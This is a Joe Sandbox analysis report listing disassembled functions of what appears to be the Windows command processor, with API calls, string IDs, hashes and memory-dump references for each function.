                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: CurrentFormatMessageThread
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2411632146-3173542853
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 454749fe332e44e2499e2ac45266b4ac95247fef249b4aa07f656cf0e31caa25
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 87f2f6b35dd97f274587744b4e09343b228dc0d85287897c9b683eab305352ba
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 454749fe332e44e2499e2ac45266b4ac95247fef249b4aa07f656cf0e31caa25
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12513571500304EBDB365B68CC4AFABB7FCEF44B00F00455DF656A2152DA75EA90CB22
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00020590 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 181fileCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,0002B7DB,0000000C,00000004,00000080,00000000), ref: 000205FF
                                                                                                                                                                                                                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 00020613
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00020663
                                                                                                                                                                                                                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,40000000,00000003,0000000C,00000003,00000080,00000000,?,?), ref: 00020695
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileSize.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?), ref: 000206D3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 000206FB
                                                                                                                                                                                                                                                                                                                                                                                                                          • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000001,?,00000000), ref: 00020717
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,000000FF,FFFFFFFF,00000002), ref: 0002E89D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$CreatePointer$ReadSize_open_osfhandle_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: con
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 58404892-4257191772
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d271bb1c97e1194b07fc96f15751e38937842d7ce018131f77d3c0932457de13
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 3486034468f9ca2ff9285b40bce96d1254559f218325d41e105d1a660b955166
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d271bb1c97e1194b07fc96f15751e38937842d7ce018131f77d3c0932457de13
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC51EA70A00324AFE7209B94EC49BBFB7F8EB86725F100325F915E21D1D77989518B66
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003C5F2 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 158COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C62E
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003C656
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C6C7
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0003C6E6
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0003C72A
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C747
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C76C
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0003C794
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C7B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,00000001,00000000,00000000), ref: 0003C7C5
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: CSVFS$NTFS$REFS
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3510147486-2605508654
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ca9521f276d4c765b870faaaaed616350734dba4f5884ac1e07a762524366641
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 5f8bd31a64121ac1277c0e0670ed5f66bc526dc5d9d7244ba2bf3a5e34645afb
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca9521f276d4c765b870faaaaed616350734dba4f5884ac1e07a762524366641
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A25141B5A042596BEB61DAA5DC89EEFBBFCEB45344F0400A9E905E3141E734DE84CF21
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00019789 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 128COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2081463915-3124875276
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bea7a14b2e8f09a7c07ae8c358669594d45ba7e0789e8a670e7a45c486a6880f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 94b2cbd4655cfaf5b3a3cd478579e31bde3e9a0d9125583df65a07eb49492364
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bea7a14b2e8f09a7c07ae8c358669594d45ba7e0789e8a670e7a45c486a6880f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B41E7712043029AEB756B64E8697FF73E4EB97725B24052FE102860D1EFA6D4C4C713
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000256C4 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 297COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A70,000000FF,00000000,?,00000001,?,?,?,00025833,?, /D /c",?,?,?,00000000,?), ref: 00031271
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: longjmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1832741078-366822981
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 19bc51a43b6f8788e2425b37ea312892c85846e62ce20b2506ebb53450cc94b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 630e46af9dde7b65f0b6333e45771d2103f2b7be7835e39abf21370abc92ad60
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19bc51a43b6f8788e2425b37ea312892c85846e62ce20b2506ebb53450cc94b2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FA1F674704614FBCF25DF14E9859EE7BA9FB48391F208015F4068B691CB74DEA1CB81
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017E93 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 146windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001A00,00000000,00000000,00000000,00050AF0,00002000,00000000,00000000,00000000,00000000), ref: 00017ED4
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001A62F: wcschr.MSVCRT ref: 0001A635
                                                                                                                                                                                                                                                                                                                                                                                                                          • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001800,00000000,00000000,00000000,00050AF0,00002000,?), ref: 00017F16
                                                                                                                                                                                                                                                                                                                                                                                                                          • _ultoa.MSVCRT ref: 0002AFC9
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 0002AFDE
                                                                                                                                                                                                                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 0002AFF3
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: FormatMessage$ByteCharMultiWide_ultoawcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Application$System
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3538039442-3455788185
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 100f46786a585e87c3152edb0ae8f819a1123814bdbe65c65e19335b53a8fa94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: ef5b8af03792aee67420ebd2115b1087b946170fae5c56e0a6d8d30de321a4b5
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 100f46786a585e87c3152edb0ae8f819a1123814bdbe65c65e19335b53a8fa94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B641F571740315ABEB209BA4DC49FAF7BBDEB46741F200129F606DB1C0DA789D40C755
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001E950 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 276COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memsetwcschr$_wcsicmpiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: :.\$=,;$=,;+/[] "
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1913572127-843887632
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8d072941eb4bfbb0295bc0fa6a5b897edc90cb56dc07fe07cc542aa30dded5dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 559206920d12c0fadca74053c8bff259194d80de4e4bf8e4d8b01afe7b9bca66
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d072941eb4bfbb0295bc0fa6a5b897edc90cb56dc07fe07cc542aa30dded5dd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65A1C130A042A59BDB74CB68E8C8BFE77B5BF45314F5402A9EC06A7291D770ADC1CB52
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000353AA Relevance: 18.2, APIs: 12, Instructions: 169COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00019E8E: iswspace.MSVCRT ref: 00019E9E
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 00035406
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003541C
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsrchr.MSVCRT ref: 0003544C
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 0003546B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 0003547B
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00035497
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0003549F
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 000354B3
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 000354D4
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,000003FF,?), ref: 00035501
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 00035557
                                                                                                                                                                                                                                                                                                                                                                                                                          • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00035578
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleMode$Handle$wcsrchr$iswspacewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4166807220-0
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 157d187936ba1e4652922d1e57af0f507bf68b9e81cf1bae857fca953cbcf28f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: efd43fac0bfb3c1fcc38fc2ba70ba8abfcc2fa79a46522c97a0d667c85f70734
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 157d187936ba1e4652922d1e57af0f507bf68b9e81cf1bae857fca953cbcf28f
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE51D4316006189AEB66AB34DC197EA77FDFF01311F1085A9E486D21E1EF749EC1CBA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017610 Relevance: 18.2, APIs: 8, Strings: 4, Instructions: 155memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,0000000C), ref: 00017669
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00017670
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008), ref: 00017686
                                                                                                                                                                                                                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0001768D
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00017719
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0001772B
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00017758
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0002AA79
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap_wcsicmp$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 435930816-3086019870
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 5efc3319142f6e98e32cc27a3c8e325f347324edca2bc129db573850a76a6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9178909a757fd9c75e6b2319d0c4645b4d89c21b47e1f371b8e27945607ae445
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5efc3319142f6e98e32cc27a3c8e325f347324edca2bc129db573850a76a6468
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC51247520C3019FE7249F38AD05AAB37E4EF4A315B14456EE906C7281FF29D881CB6B
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003AEBD Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 266COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF04
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF2E
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0003AF58
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000,0001250C,?,?,00000000,-00000105,-00000105,-00000105), ref: 0003B08B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,?,?,?), ref: 0003B095
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?), ref: 0003B0AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B1DA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B1F2
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,?,?,?,?,?,?,?,?,?), ref: 0003B20A
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
